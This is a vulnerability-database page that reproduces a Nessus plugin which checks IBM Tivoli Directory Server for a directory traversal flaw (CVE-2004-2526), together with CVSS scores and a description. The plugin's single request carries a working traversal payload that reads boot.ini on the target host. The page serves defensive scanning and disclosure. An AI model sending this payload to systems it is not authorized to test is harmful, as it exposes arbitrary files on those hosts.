Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2004-2021 Tenable Network Security, Inc.TIVOLI_LDACGI_TRAVERSAL.NASL
HistoryAug 02, 2004 - 12:00 a.m.

Tivoli Directory Server ldacgi.exe Template Parameter Traversal Arbitrary File Access

2004-08-0200:00:00
This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.
www.tenable.com
39

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

EPSS

0.01

Percentile

84.0%

JSON

The remote host is running IBM Tivoli’s Directory Server, a lightweight LDAP server with a web frontend.

There is a directory traversal issue in the web frontend of this program, specifically in the ‘ldacgi.exe’ CGI. An attacker may exploit this flaw to read arbitrary files on the remote system with the privileges of the web server.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
 script_id(14191); 
 script_version("1.21");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

 script_cve_id("CVE-2004-2526");
 script_bugtraq_id(10841);

 script_name(english:"Tivoli Directory Server ldacgi.exe Template Parameter Traversal Arbitrary File Access");
 script_summary(english:"IBM Tivoli Directory Traversal");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is prone to a directory traversal attack." );
 script_set_attribute(attribute:"description", value:
"The remote host is running IBM Tivoli's Directory Server, a
lightweight LDAP server with a web frontend. 

There is a directory traversal issue in the web frontend of this
program, specifically in the 'ldacgi.exe' CGI.  An attacker may
exploit this flaw to read arbitrary files on the remote system with
the privileges of the web server." );
 script_set_attribute(attribute:"see_also", value:"http://www.oliverkarow.de/research/IDS_directory_traversal.txt" );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2004/Aug/29" );
 script_set_attribute(attribute:"see_also", value:"http://www-1.ibm.com/support/docview.wss?uid=swg1IR53631" );
 script_set_attribute(attribute:"solution", value:
"Apply 3.2.2 Fix Pack 4 / 4.1 Fix Pack 3 or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2004/08/02");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/08/02");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:tivoli_directory_server");
 script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

 script_category(ACT_GATHER_INFO);

 script_copyright(english:"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");

 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

w = http_send_recv3(method:"GET", port: port,
 item:"/ldap/cgi-bin/ldacgi.exe?Action=Substitute&Template=../../../../../boot.ini&Sub=LocalePath&LocalePath=enus1252");
if (isnull(w)) exit(1, "the web server did not answer");
res = strcat(w[0], w[1], '\r\n', w[2]);
   
if ("[boot loader]" >< res )
{
  security_warning(port);
  exit(0);
}

Related

nvd 1
cvelist 1
exploitdb 1
cve 1
nvd
nvd
CVE-2004-2526
2004-12-31 05:00:00
cvelist
cvelist
CVE-2004-2526
2005-10-25 04:00:00
exploitdb
exploitdb
IBM Tivoli Directory Server 3.2.2/4.1 - LDACGI Directory Traversal
2004-08-02 00:00:00
cve
cve
CVE-2004-2526
2005-10-25 04:00:00

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

EPSS

0.01

Percentile

84.0%

JSON
Related for TIVOLI_LDACGI_TRAVERSAL.NASL
nvd1cvelist1exploitdb1cve1